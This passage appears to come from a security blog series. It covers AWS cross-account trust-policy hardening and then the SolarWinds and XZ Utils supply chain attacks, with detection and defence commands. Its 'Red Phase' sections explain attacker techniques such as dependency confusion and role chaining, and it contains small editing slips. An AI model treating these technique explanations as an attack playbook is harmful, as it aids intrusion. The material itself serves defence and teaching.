    created: .CreatedAt
  }'

AWS Access Analyzer: Automated Trust Policy Audit

Access Analyzer scans all resource-based policies in the account and flags any that grant access to principals outside the account or organization. It surfaces the vulnerable trust policy before an attacker finds it.

# List all Access Analyzer findings — these are cross-account or public access grants
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query 'analyzers[0].arn' --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {
    id: .id,
    resource_type: .resourceType,
    resource: .resource,
    principal: .principal,
    action: .action,
    condition: .condition,
    created: .createdAt
  }'

An Access Analyzer finding for the vulnerable trust policy looks like:

{
  "id": "a1b2c3d4-...",
  "resourceType": "AWS::IAM::Role",
  "resource": "arn:aws:iam::222222222222:role/datalake-reader",
  "principal": {"AWS": "arn:aws:iam::111111111111:root"},
  "action": ["sts:AssumeRole"],
  "condition": {},
  "status": "ACTIVE"
}

The arn:aws:iam::111111111111:root principal with no condition block is the flag — the entire dev account, no restrictions.

Purple Phase: Structural Fixes

Fix 1: Scope the Trust Policy to the Specific Source ARN

This is the primary fix. The trust policy should name the exact role that needs access, not the account root.

// BAD — allows any identity in the dev account to assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:root"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

// GOOD — only the specific Lambda execution role can assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:role/api-processor-lambda-execution-role"
      },
      "Action": "sts:AssumeRole",
      "Condition": {
        "StringEquals": {
          "sts:ExternalId": "prod-datalake-access-v1"
        }
      }
    }
  ]
}

# Update an existing trust policy to scope it properly
aws iam update-assume-role-policy \
  --role-name datalake-reader \
  --policy-document file://scoped-trust-policy.json

Fix 2: Add ExternalId for Confused Deputy Protection

ExternalId is a shared secret between the two parties establishing the cross-account trust. When the source role calls sts:AssumeRole, it must provide the ExternalId value, or the assumption is denied.

This protects against the confused deputy problem: an attacker who compromises a role that legitimately trusts your role cannot exploit that trust without also knowing the ExternalId.

# Source (dev Lambda) must pass ExternalId when assuming the prod role
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "api-processor-job" \
  --external-id "prod-datalake-access-v1"
# If ExternalId is wrong or absent: error — not authorized to assume role

The limitation: ExternalId does not help if the source account itself is compromised and the attacker has access to the application code or environment variables that contain the ExternalId value. It adds friction for opportunistic attackers and covers the confused deputy scenario — it is not a substitute for scoping the principal ARN.

Fix 3: Organizations SCPs to Restrict Cross-Account Assumptions

Service Control Policies at the AWS Organizations level can restrict which accounts are allowed to assume roles in which other accounts. This is the enforcement layer that cannot be bypassed by any identity inside a member account.

// SCP: Only allow cross-account role assumptions between approved account pairs
// Attach to the prod account's OU
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RestrictCrossAccountAssumeRole",
      "Effect": "Deny",
      "Action": "sts:AssumeRole",
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:PrincipalAccount": [
            "111111111111",
            "333333333333"
          ]
        },
        "BoolIfExists": {
          "aws:PrincipalIsAWSService": "false"
        }
      }
    }
  ]
}

This SCP denies any sts:AssumeRole call that originates from an account not in the approved list. Even if someone adds a new trust policy in prod that allows an arbitrary external account, the SCP blocks the call at the organization level.

Fix 4: Enable Access Analyzer Organization-Wide

Access Analyzer should run with an organization-level analyzer, not just per-account. The organization analyzer has visibility across all member accounts and flags cross-account trust policies automatically.

# Create an organization-level analyzer (run from the management account)
aws accessanalyzer create-analyzer \
  --analyzer-name org-wide-access-analyzer \
  --type ORGANIZATION \
  --tags '{"Environment": "production", "Team": "security"}'

# List active findings organization-wide
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query "analyzers[?type=='ORGANIZATION'].arn | [0]" \
  --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"resourceType": {"eq": ["AWS::IAM::Role"]}, "status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {resource: .resource, principal: .principal}'

Fix 5: Prefer OIDC Workload Identity Over Cross-Account Roles

Where the access pattern allows it, replacing the cross-account role with OIDC workload identity eliminates the static trust relationship entirely. A Lambda function with an OIDC identity can authenticate to the prod account by exchanging a token, without any persistent trust policy entry that an attacker could enumerate and exploit.

The federated identity trust boundaries approach using OIDC workload identity removes the assumable role from the attack surface completely — there is no trust policy to misscope, no role ARN to enumerate, and no sts:AssumeRole call in CloudTrail to detect because the assumption never happens.

Fix 6: Enable GuardDuty Cross-Account Threat Detection at Org Level

GuardDuty with multi-account management via AWS Organizations correlates threat signals across accounts. A pattern that looks like routine IAM activity in isolation — role assumption, S3 ListBucket, GetObject — reads as a lateral movement sequence when correlated across dev and prod accounts.

# Enable GuardDuty for all accounts in the organization (from management account)
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty update-organization-configuration \
  --detector-id "${DETECTOR_ID}" \
  --auto-enable \
  --data-sources '{
    "S3Logs": {"AutoEnable": true},
    "Kubernetes": {"AuditLogs": {"AutoEnable": true}},
    "MalwareProtection": {"ScanEc2InstanceWithFindings": {"AutoEnable": true}}
  }'

⚠ Production Gotchas

ExternalId doesn’t protect you if the source account is compromised. The attacker who holds the dev Lambda’s execution role credentials also has access to the Lambda’s environment variables and source code — where the ExternalId value is likely stored. ExternalId is not a secret the attacker can’t reach; it is a value the legitimate caller passes to prove it initiated the request. Scope the principal ARN first; add ExternalId as a second layer.

Access Analyzer only catches public and cross-account access, not intra-account lateral movement. If the attacker is already operating inside the same account as the target role, Access Analyzer does not flag the trust relationship. Intra-account over-broad trust policies require IAM policy analysis tooling (Cloudsplaining, Prowler) to surface — Access Analyzer won’t show them.

Role chaining resets the session clock but the window is still one hour. sts:AssumeRole sessions last up to one hour by default. An attacker doing role chaining gets a fresh one-hour window at each hop. Persistent access requires refreshing before expiry — which means repeated AssumeRole calls in CloudTrail that form a detectable pattern if you’re querying for it.

S3 exfiltration may not trigger GuardDuty immediately. GuardDuty’s Exfiltration:S3/ObjectRead.Unusual finding uses a behavior baseline. A new attacker session has no baseline — the first data exfiltration may not fire the finding if the volume appears “normal” relative to what GuardDuty has seen from that role before. CloudTrail GetObject events are the reliable signal; don’t rely on GuardDuty alone for S3 exfiltration detection.

arn:aws:iam::ACCOUNT:root in a trust policy does not mean the root user specifically. This is a common misread. arn:aws:iam::123456789012:root means any principal in account 123456789012 — IAM users, roles, the root user, and federated identities. It is the account-level wildcard, which is exactly why it’s dangerous in a cross-account trust policy.

Quick Reference

Lateral Movement Technique	CloudTrail Signal	Detection Tool	Structural Fix
Cross-account `sts:AssumeRole`	`AssumeRole` where source accountId ≠ target accountId in role ARN	CloudTrail + Athena query	Scope Principal to specific role ARN
Account root as trust principal	Access Analyzer ACTIVE finding on IAM Role	AWS Access Analyzer	Replace `root` with specific ARN + ExternalId
Role chaining across accounts	Multiple sequential `AssumeRole` events, each with new session token	CloudTrail session correlation	SCP restricting cross-account assumptions to approved pairs
Exfiltration via assumed prod role	S3 `GetObject`/`ListBucket` from assumed-role session in CloudTrail	CloudTrail + GuardDuty `Exfiltration:S3/ObjectRead.Unusual`	Least-privilege S3 policy on prod role + S3 Access Logs
IAM enumeration from compromised identity	`iam:ListRoles`, `iam:GetRole`, `iam:SimulatePrincipalPolicy`	GuardDuty `Recon:IAMUser/UserPermissions`	Deny `iam:*` on Lambda execution roles
Secrets Manager access via assumed role	`secretsmanager:GetSecretValue` from unexpected principal	CloudTrail resource policy audit	Attach resource policy to secrets scoping allowed principals

Key Takeaways

Cloud lateral movement IAM chains are not exploits — they are valid API calls that execute because someone wrote a trust policy that was too broad; the fix is always in the trust policy, not in the network
Every cross-account trust policy that uses arn:aws:iam::ACCOUNT:root as the principal is an open door for any compromised identity in that account — scope it to the specific role ARN before an attacker finds it before you do
CloudTrail AssumeRole events where the principal’s account ID doesn’t match the target role’s account ID are the detection signal; run the Athena query in your environment this week and look at what comes back
AWS Access Analyzer with an organization-level analyzer surfaces the vulnerable trust policies automatically — if you’re not running it, you’re auditing trust policies manually or not at all
IAM privilege escalation paths and cross-account lateral movement compound: an attacker who escalates privilege inside a source account has more roles to attempt cross-account assumptions from, extending the blast radius further
Defense in depth requires all three layers: scoped trust policy principal, ExternalId condition, and an SCP blocking assumptions from non-approved accounts — any single layer has a bypass

What’s Next

EP11 is where the series pivots from attack paths to detection engineering. We’ve covered how attackers compromise identities, escalate privilege, move laterally through cloud accounts, and exfiltrate data. EP11 asks a harder question: how do you build detection rules that catch these techniques at the kernel level — before the attack completes, not after it shows up in CloudTrail?

The answer involves eBPF: kernel-level visibility that gives you process execution context, network connections, and file system access in real time, mapped to the cloud workload identity making the API calls. A SIEM ingesting CloudTrail logs sees what happened after the fact. eBPF running on the node sees the aws sts assume-role subprocess spawn, the credential file write, and the outbound S3 connection — while it’s happening.

Get EP11 in your inbox when it publishes → subscribe at linuxcent.com

Supply Chain Attacks: From SolarWinds to XZ Utils — Detection and Defense

June 30, 2026 by Vamshi Krishna Santhapuri

Reading Time: 14 minutes

TL;DR

Supply chain attack detection is OWASP A06 + A08: attackers compromise the software build or distribution chain so that legitimate, signed artifacts deliver malicious payloads — standard vulnerability scanning misses this entirely
SolarWinds (December 2020): threat actors compromised the Orion build system in March 2020, waited eight months, inserted the SUNBURST backdoor into a digitally signed update, and reached 18,000+ organizations including the U.S. Treasury, DHS, and DoD
XZ Utils (CVE-2024-3094, March 2024): the “Jia Tan” persona spent two years building open-source credibility before inserting a backdoor into release tarballs — the backdoor was not in the git repo, only in the distributed tarball (release tarball = the compressed archive that Linux distributions download to build the package — separate from the git source tree)
The XZ backdoor targeted liblzma, which is linked into sshd via systemd on affected distros — a compromised SSH daemon on every major Linux distribution was days away from shipping
Detection relied on human observation: Andres Freund noticed a 500ms SSH connection delay during unrelated benchmarking, traced it with strace, and found sshd making unexpected calls into liblzma
The structural fix is a pipeline: pin dependencies with hashes + private artifact registry + SBOM generation + image signing with Sigstore/cosign — each layer catches a different attack class

OWASP Mapping: A06 Vulnerable and Outdated Components — compromised upstream dependencies. A08 Software and Data Integrity Failures — build artifacts not signed or verified; release tarball content not validated against source.

The Big Picture

┌──────────────────────────────────────────────────────────────────────────┐
│                  SUPPLY CHAIN ATTACK SURFACE                             │
│                                                                          │
│   SOURCE REPO          BUILD SYSTEM         ARTIFACT REGISTRY           │
│   github.com/org  ──▶  CI/CD pipeline  ──▶  container registry / PyPI  │
│        │                    │                      │                     │
│        │                    │                      │                     │
│   ATTACK POINT 1:      ATTACK POINT 2:       ATTACK POINT 3:            │
│   Social engineer      Compromise the        Typosquatting /             │
│   maintainer trust     build host            dependency confusion        │
│   (XZ model)           (SolarWinds model)    (public registry model)    │
│        │                    │                      │                     │
│        └────────────────────┴──────────────────────┘                    │
│                             │                                            │
│                    COMPROMISED ARTIFACT                                  │
│             (signed, valid, ships with legitimate release)               │
│                             │                                            │
│                             ▼                                            │
│        PRODUCTION SYSTEMS (18,000 orgs / every major Linux distro)      │
│                                                                          │
│   ═══════════════════════════════════════════════════════════════        │
│   DETECTION PIPELINE                                                     │
│   Hash pinning + SBOM + Sigstore verify + tarball ≠ git diff check      │
│   Each layer catches a different attack class                            │
└──────────────────────────────────────────────────────────────────────────┘

Supply chain attack detection is hard because the artifact being delivered is legitimate by every traditional check: it is signed by the vendor, it passes antivirus, it resolves from the correct registry. The attack happened before the artifact was packaged, inside the trust chain you already approved. SolarWinds and XZ Utils are not anomalies — they are the template.

Two Incidents — Same Attack Surface

SolarWinds (December 2020)

The SolarWinds compromise is the definitive build-system attack. The timeline:

March 2020       Threat actor (UNC2452 / Cozy Bear) gains access to
                 SolarWinds build environment

October 2020     SUNBURST backdoor code inserted into SolarWinds Orion
                 build process — not into the source repository

October 2020     Orion 2019.4 through 2020.2.1 builds produced with
                 SUNBURST included — binaries digitally signed by
                 SolarWinds with their valid code-signing certificate

October–         SUNBURST distributed to ~18,000 customers via the
December 2020    legitimate Orion software update mechanism

December 2020    FireEye detects SUNBURST while investigating their own
                 breach — reports to SolarWinds and CISA

What made detection almost impossible:

The compiled binary passed every integrity check a customer would run. It was signed with SolarWinds’ legitimate certificate. It installed via the normal software update channel. The SUNBURST code itself was designed for low observability: it dormant for 12–14 days after installation, used legitimate SolarWinds API patterns to blend with normal Orion traffic, and used legitimate cloud infrastructure (Avsvmcloud.com, which resolved to valid cloud provider IPs) for command-and-control.

The C2 communication was disguised as standard Orion telemetry. Exfiltration was slow — the attackers were not bulk-extracting data, they were selecting targets and moving laterally only inside high-value organizations.

The attack vector was the build system, not source code. SolarWinds source repositories did not contain SUNBURST. The attacker modified the compiled output at build time. A code review of the SolarWinds source would have found nothing.

XZ Utils (CVE-2024-3094, March 2024)

The XZ Utils compromise is more instructive because it was social engineering at the package maintainer level, caught before it shipped widely — and the catch was accidental.

Timeline:

November 2021    GitHub user "Jia Tan" (JiaT75) makes first commit to
                 xz-utils repository

2022–2023        Jia Tan steadily contributes quality patches to xz-utils,
                 builds trust with maintainer Lasse Collin, is eventually
                 granted commit access

Early 2024       Jia Tan accelerates commit activity, coordinates social
                 pressure on Lasse Collin from other fake personas to
                 push releases faster

February 2024    Jia Tan releases xz 5.6.0 — backdoor code inserted in
                 the release tarball build process (not in git commits)

March 9, 2024    xz 5.6.1 released with minor obfuscation changes

March 28–29,     Andres Freund (PostgreSQL/Microsoft engineer) notices
2024             500ms SSH connection delay on his Debian sid machine
                 while running unrelated Valgrind benchmarks

March 29, 2024   Freund traces the delay with strace, finds sshd making
                 unexpected calls into liblzma, reports to oss-security
                 mailing list

March 30, 2024   CISA advisory published. Fedora 40 beta, Debian unstable,
                 openSUSE Tumbleweed had all shipped the affected version.
                 Ubuntu 24.04 LTS was in freeze and had it staged.

What was backdoored and how:

xz-utils provides the liblzma compression library. On systemd-based Linux distributions, sshd links against libsystemd, which links against liblzma. The backdoor hooked into sshd‘s RSA key processing — specifically RSA_public_decrypt — to allow authentication bypass using a specific attacker-controlled private key.

The backdoor was not in the git repository. It was injected during the tarball release process via obfuscated test files in the repository that were assembled and compiled during the build. Comparing the released tarball to the git tree reveals extra files and code that do not appear in any git commit:

xz --version
# 5.6.0 or 5.6.1 = affected; 5.4.x = safe

# How Andres Freund found it
# He was running sshd benchmarks and noticed unexpected latency
strace -p $(pgrep sshd) 2>&1 | head -20
# Saw unexpected calls into liblzma that should not be there
# Normal sshd does not call into liblzma at all

# Verify tarball vs git diff (the forensic check)
# If you have both the tarball and git source:
tar xf xz-5.6.1.tar.gz
git clone https://github.com/tukaani-project/xz.git xz-git
diff -r xz-5.6.1/ xz-git/
# Extra files in the tarball that don't appear in git = compromise indicator

What makes this attack class so dangerous:

The actor ran a multi-year operation. Two years of legitimate contributions, relationship-building with maintainers, and social pressure coordination across multiple fake personas. The code quality was good — Jia Tan’s legitimate commits improved xz-utils. The backdoor code was technically sophisticated enough that it took days of analysis to fully reverse-engineer after Freund’s discovery.

Red Phase: How Supply Chain Attacks Work in Practice

There are three distinct attack surfaces. They require different defenses and catch different attack classes.

1. Build System Compromise (SolarWinds Model)

The attacker gains access to the CI/CD or build host and modifies compiled artifacts. The source code is clean. Git history is clean. Only the build output is poisoned.

What makes it hard to catch: legitimate signing certificate, normal distribution channel, artifact passes all integrity checks that consumers run.

Simulation (safe to run in a test environment):

# Understand your build artifact's provenance
# Can you trace a production binary back to a specific source commit?

# For a Docker image: inspect build metadata
docker inspect your-org/your-image:latest | \
  jq '.[0].Config.Labels'
# Look for: org.opencontainers.image.revision (git SHA)
#           org.opencontainers.image.source (repo URL)
# If these labels are absent, you cannot verify what source built this image

# For a Go binary: read embedded build info
go version -m /path/to/binary
# Shows: Go version, module path, dependencies with versions and hashes
# If -trimpath was used during build, some info may be stripped

# Check if a container image was built from a known CI workflow
# (assumes SLSA provenance attestation is present)
cosign verify-attestation \
  --type slsaprovenance \
  --certificate-identity-regexp=".*" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  your-org/your-image:latest | \
  jq -r '.payload | @base64d | fromjson | .predicate.buildType'

2. Dependency Hijacking: Typosquatting and Dependency Confusion

Typosquatting: a malicious package on PyPI/npm with a name close to a popular package (requets vs requests, djano vs django). Developers with a typo in their requirements.txt install the malicious package.

Dependency confusion: a private internal package (mycompany-utils) has the same name as a package you upload to the public registry with a higher version number. Package managers that check public registries before private ones will resolve the public (malicious) version.

# Test for dependency confusion: can your private package names be
# resolved from the public registry?
# Do this in a throwaway environment, NOT production

# For Python: check if your internal package name exists on PyPI
pip index versions your-internal-package-name 2>/dev/null
# If it returns versions and you didn't publish it there = confusion risk

# For npm: check if your scoped package exists on the public registry
npm view @your-scope/your-package version 2>/dev/null
# An unscoped internal package with a public registry hit = confusion risk

# For pip: audit your requirements for known-bad packages
pip-audit --requirement requirements.txt
# pip-audit checks against the OSV vulnerability database
# Install: pip install pip-audit

# For npm: audit for both vulnerabilities and signature issues
npm audit
npm audit signatures
# 'npm audit signatures' verifies that packages in node_modules were
# signed with registry-issued keys — catches tampered downloads

The hardest attack class to detect from the outside. A trusted maintainer is either compromised or is the attacker. Their commits are signed, their track record is legitimate, the package comes from the canonical repository.

What you can check:

# Verify a PyPI package hash matches what's listed in the index
# The hash listed on PyPI is set at upload time — if the file was
# replaced after upload, the hash would change (PyPI prevents this,
# but private/mirror registries may not)
pip download requests==2.31.0 --no-deps --dest /tmp/pkg-check/
sha256sum /tmp/pkg-check/requests-2.31.0-py3-none-any.whl
# Compare to the hash shown at pypi.org/project/requests/2.31.0/#files

# Check npm package signatures (post-XZ hygiene)
npm audit signatures
# Output shows: verified (good), missing (not signed), invalid (tampered)

# For containers: verify Sigstore signature
cosign verify \
  --certificate-identity-regexp=".*" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest
# If this fails: the image was not built by the expected GitHub Actions workflow

Blue Phase: Detection

SLSA: What Level Your Pipeline Should Be At

SLSA (Supply chain Levels for Software Artifacts) is a framework for build pipeline integrity. Four levels:

SLSA Level 1  Build process is scripted/automated, produces provenance
              Most teams can reach this today
              Catches: accidental modifications, basic auditability

SLSA Level 2  Build runs on a hosted, version-controlled build platform
              (GitHub Actions, GitLab CI) — provenance is signed by the
              build platform, not just the developer
              Catches: developer workstation compromise

SLSA Level 3  Hermetic builds — the build environment is isolated from
              the network, cannot pull external resources at build time
              Provenance is non-forgeable
              Catches: build-time dependency injection, most CI/CD attacks

SLSA Level 4  (deprecated in SLSA v1.0, merged into L3)

Most teams should target SLSA Level 2 now, Level 3 within 6 months.
Level 3 is where SolarWinds-class attacks become detectable.

Container Image Signing with Sigstore/cosign

# Sign a container image after build (in CI, using OIDC — no stored key)
# This runs inside GitHub Actions after the docker push step
cosign sign \
  --yes \
  ghcr.io/your-org/your-image:${GITHUB_SHA}
# cosign uses the GitHub Actions OIDC token to sign — no private key needed
# The signature is stored in the registry alongside the image

# Verify the signature and check the certificate claims
cosign verify \
  --certificate-identity="https://github.com/your-org/your-repo/.github/workflows/build.yml@refs/heads/main" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest | \
  jq '.[0] | {
    issuer: .optional.Issuer,
    workflow: .optional.BuildSignerURI,
    repo: .optional.SourceRepositoryURI,
    ref: .optional.SourceRepositoryRef
  }'
# A passing verification means:
# - Image was built by a specific GitHub Actions workflow
# - In a specific repository, on a specific branch
# - At a specific time (cert has a 10-minute TTL)

SBOM Generation and Vulnerability Scanning

An SBOM (Software Bill of Materials) enumerates every component in a software artifact. Without an SBOM, you cannot answer “are we affected by the XZ backdoor?” across your fleet in under an hour.

# Generate an SBOM for a container image using syft
syft your-org/your-image:latest -o cyclonedx-json > sbom.json
# syft walks the image layers and catalogs every package,
# including OS packages (rpm/deb), language packages (pip/npm/go),
# and their versions

# Inspect what syft found
cat sbom.json | jq '.components[] | select(.name == "xz-libs") | {name, version, purl}'
# Example output:
# {
#   "name": "xz-libs",
#   "version": "5.4.4-1.el9",    ← 5.4.x = safe; 5.6.0/5.6.1 = backdoored
#   "purl": "pkg:rpm/redhat/[email protected]?arch=x86_64"
# }

# Scan the SBOM for known vulnerabilities
grype sbom:./sbom.json
# grype checks each component against Grype's vulnerability database
# (CVE, GHSA, OSV) — would have flagged CVE-2024-3094 once published

# Automate: generate SBOM and scan in CI, fail build if critical CVEs found
grype sbom:./sbom.json --fail-on critical

Build Provenance with GitHub Actions (SLSA Level 2/3)

# .github/workflows/build.yml
# Adds SLSA provenance attestation to every release artifact
name: Build and attest

on:
  push:
    tags: ["v*"]

permissions:
  contents: write
  id-token: write       # Required for OIDC signing
  attestations: write   # Required for GitHub attestation API

jobs:
  build:
    runs-on: ubuntu-latest
    outputs:
      image-digest: ${{ steps.push.outputs.digest }}
    steps:
      - uses: actions/checkout@v4

      - name: Build and push container image
        id: push
        uses: docker/build-push-action@v5
        with:
          push: true
          tags: ghcr.io/${{ github.repository }}:${{ github.ref_name }}

      - name: Generate SLSA provenance attestation
        uses: actions/attest-build-provenance@v1
        with:
          subject-name: ghcr.io/${{ github.repository }}
          subject-digest: ${{ steps.push.outputs.digest }}
          push-to-registry: true
          # This generates a signed SLSA provenance statement that records:
          # - Which workflow built this artifact
          # - The git SHA it was built from
          # - The trigger event
          # Stored alongside the image in the registry

# Verify the attestation against an image
gh attestation verify \
  oci://ghcr.io/your-org/your-image:latest \
  --owner your-org
# Passes: image provenance is traceable to a specific workflow run
# Fails: image was built and pushed outside any attested workflow

What Anomaly Detection Catches

Sigstore and SBOM scanning catch known-bad artifacts. Anomaly detection catches behavior that hasn’t been classified yet:

Unexpected external connections during build: a hermetic build should make zero network calls after dependency fetch. Any egress during the build phase is a signal — a compromised build tool phoning home, a dependency pulling a secondary payload at install time
Artifact hash drift: if the same source commit produces different binary output on two consecutive builds, the build environment is non-deterministic at best, compromised at worst. Reproducible builds produce identical byte-for-byte output from identical inputs — hash drift indicates something in the build environment changed
New dependency additions without PR: any dependency that appears in a build artifact but was not added via a reviewed pull request is an anomaly. SBOMs make this comparison possible; without them it is invisible

# Check for unexpected network connections during a build
# Run this on the build host during a CI job
ss -tnp | grep -E "(ESTABLISHED|SYN_SENT)"
# Any connection to an IP outside your artifact registry and SCM = investigate

# Compare artifact hashes across two builds of the same commit
# (tests build reproducibility)
docker pull ghcr.io/your-org/your-image@sha256:<first-build-digest>
docker pull ghcr.io/your-org/your-image@sha256:<second-build-digest>
# If the digests differ for the same source commit, investigate

Purple Phase: Structural Fixes

1. Pin Dependencies with Hashes — Not Just Versions

Version pinning (requests==2.31.0) pins the version number. The package maintainer can yank and re-upload that version with different content on some registries. Hash pinning locks the exact file bytes:

# requirements.txt — hash-pinned
requests==2.31.0 \
    --hash=sha256:58cd2187423839e4e2d07f6f16c9cd680e74d6066237a4e1e88f06fc4a3e2e56 \
    --hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1
# Two hashes because the package ships both a wheel and a source tarball
# pip verifies the downloaded file matches one of these hashes before installing

# Generate hash-pinned requirements from a working environment
pip-compile --generate-hashes requirements.in --output-file requirements.txt
# pip-compile resolves the full dependency tree and writes pinned+hashed output

For containers, pin base images by digest, not by tag:

# Vulnerable: mutable tag
FROM python:3.11-slim

# Secure: pinned digest
FROM python:3.11-slim@sha256:6a37af1bde8be89040f70b9e93f2f61b5f14e99d7e49f9ea3dc7ded2e1c82f7b
# The digest is immutable — this exact image layer will always be fetched,
# regardless of what the 3.11-slim tag points to in the future

2. Private Artifact Registry — No Direct PyPI or npm in Production CI

A private registry (Artifactory, Nexus, AWS CodeArtifact, Google Artifact Registry) proxies upstream registries and caches approved packages. Benefits:

Dependency confusion protection: your CI resolves mycompany-utils from your private registry first, never from public PyPI
Availability independence: a PyPI outage does not break your builds
Audit trail: every package version pulled in every build is logged
Policy enforcement: you can block packages with unacceptable licenses or CVE scores

# Configure pip to use a private registry proxy exclusively
# In ci/pip.conf or as environment variable
export PIP_INDEX_URL="https://your-artifactory.company.com/artifactory/api/pypi/pypi-virtual/simple/"
export PIP_TRUSTED_HOST="your-artifactory.company.com"
# No direct PyPI access — all packages go through your registry proxy

# For npm: configure registry in .npmrc
echo "registry=https://your-artifactory.company.com/artifactory/api/npm/npm-virtual/" > .npmrc
echo "always-auth=true" >> .npmrc

3. Reproducible Builds — Same Input Produces Same Output

Reproducible builds allow independent verification: a third party can take the same source and build environment and produce a byte-for-byte identical artifact. If the published artifact does not match, something changed between source and distribution.

This is exactly how the XZ tarball compromise would have been caught earlier with proper tooling: the release tarball did not match what would be produced by checking out the git tag and running the build.

# For Go: builds are reproducible by default in Go 1.13+
# Verify by building twice and comparing
go build -o binary-1 ./cmd/...
go build -o binary-2 ./cmd/...
sha256sum binary-1 binary-2
# Identical hashes = reproducible

# For containers with BuildKit: use --no-cache and compare digests
DOCKER_BUILDKIT=1 docker build --no-cache -t test-1 .
DOCKER_BUILDKIT=1 docker build --no-cache -t test-2 .
docker inspect test-1 test-2 | jq '.[].Id'
# Identical IDs = reproducible build environment

# SOURCE_DATE_EPOCH forces reproducible timestamps (common reproducibility blocker)
export SOURCE_DATE_EPOCH=$(git log -1 --format=%ct)
make  # or whatever your build command is

4. Separate Build and Release Environments

SolarWinds built and signed in the same compromised environment. The build environment had signing keys. An attacker who owns the build host owns the signing operation.

INSECURE:                           SECURE:

Build host ──▶ compile              Build host ──▶ compile
           ──▶ sign artifact                   ──▶ output unsigned artifact
           ──▶ publish                                    │
                                                          ▼
                                    Separate signing host (air-gapped or HSM)
                                                    ──▶ verify artifact hash
                                                    ──▶ sign with HSM key
                                                    ──▶ publish signed artifact

In practice: signing keys should live in a hardware security module (HSM) or KMS, not on the build host. The build produces an artifact hash; the signing service receives only the hash, not the full artifact, and signs it with the HSM-protected key. Build host compromise does not yield the signing key.

5. SBOM in Every Release — Non-Negotiable

If you cannot enumerate what is in your artifact, you cannot answer supply chain compromise questions. When CVE-2024-3094 dropped, every organization with an SBOM could query it in minutes. Organizations without one had to manually inspect every container image and every deployed system.

# Attach SBOM to a container image as an attestation (stored in registry)
syft ghcr.io/your-org/your-image:latest -o cyclonedx-json | \
  cosign attest \
    --predicate /dev/stdin \
    --type cyclonedx \
    ghcr.io/your-org/your-image:latest
# The SBOM is now stored alongside the image and signed with OIDC credentials

# Later: retrieve and search the SBOM
cosign verify-attestation \
  --type cyclonedx \
  --certificate-identity-regexp=".*" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest | \
  jq -r '.payload | @base64d | fromjson | .predicate.components[] | 
    select(.name == "xz-libs") | {name, version}'

⚠ Production Gotchas

Hash pinning breaks automated dependency update workflows. When you pin with hashes, tools like Dependabot and Renovate still open PRs, but they must also update the hashes. This works — both tools support hash pinning — but you must configure them explicitly. Without hash update support in your automation, developers will remove pinning to unblock themselves.

SLSA Level 3 requires hermetic builds — most teams are not ready. Hermetic means the build process makes no network calls during compilation (all dependencies fetched in a prior, logged step). Most existing CI pipelines fetch dependencies during the build step. Reaching SLSA Level 3 requires restructuring your pipeline into explicit fetch → build phases. Start at Level 2 (hosted, signed provenance) and treat Level 3 as a 6-month target.

SBOMs without a query workflow are paperwork. Generating an SBOM with syft and storing it somewhere is the easy part. The useful part is having a process to query all SBOMs across your fleet within minutes of a new CVE. Without that query infrastructure, you have documentation, not detection capability.

Cosign verify fails silently if no signature exists. By default, if an image has no cosign signature, cosign verify returns an error — which is correct. But in a Kubernetes admission webhook that enforces signing (e.g., Kyverno, OPA/Gatekeeper), an unsigned image must be an explicit policy violation, not a webhook error that gets bypassed by a fail-open configuration. Always run admission webhooks in fail-closed mode.

Tarball vs git diff requires automation. Manually diffing every release tarball against its git tag is not sustainable. The XZ compromise would have been caught earlier if distributions had automated this check as part of their packaging workflow. Tools like diffoscope can automate the comparison; integrating it into your package intake process is the structural fix.

Quick Reference

Attack Vector	Detection Signal	Fix
Build system compromise (SolarWinds)	Artifact hash drift; unexpected egress during build; tarball ≠ git diff	SLSA Level 3 hermetic builds; separate signing environment
Maintainer social engineering (XZ)	Tarball ≠ git diff; SBOM shows unexpected dependency; anomalous sshd syscalls	Reproducible builds; tarball verification in package intake
Dependency confusion	Package resolves from public registry instead of private	Private artifact registry with scoped package names
Typosquatting	`pip-audit` / `npm audit signatures` findings	Private registry; automated dependency scanning in CI
Unsigned container image	`cosign verify` fails; no attestation in registry	Sigstore/cosign in CI; fail-closed admission webhook

Key Takeaways

Supply chain attacks bypass perimeter security entirely — the attacker delivers malware through a channel you already trust, signed by a certificate you already trust, via an update mechanism you already approve
SolarWinds was caught by a downstream victim (FireEye), not by SolarWinds’ own security team — the build environment had no integrity monitoring that could detect modification of compiled artifacts
XZ Utils was caught by an engineer noticing a 500ms latency anomaly during unrelated performance work, not by any security tooling — this was within days of the backdoor shipping in multiple stable Linux distribution releases
The detection pipeline has five layers, each catching a different attack class: hash pinning (dependency hijacking), SBOM (enumeration and CVE correlation), Sigstore signing (artifact integrity), SLSA provenance (build traceability), tarball vs git diff (source/distribution divergence)
Start with what you can implement this week: pip-audit or npm audit signatures in CI, syft SBOM generation on every image build, and cosign signing for any container image that reaches production — these three steps cover the most common attack classes with minimal pipeline restructuring

What’s Next

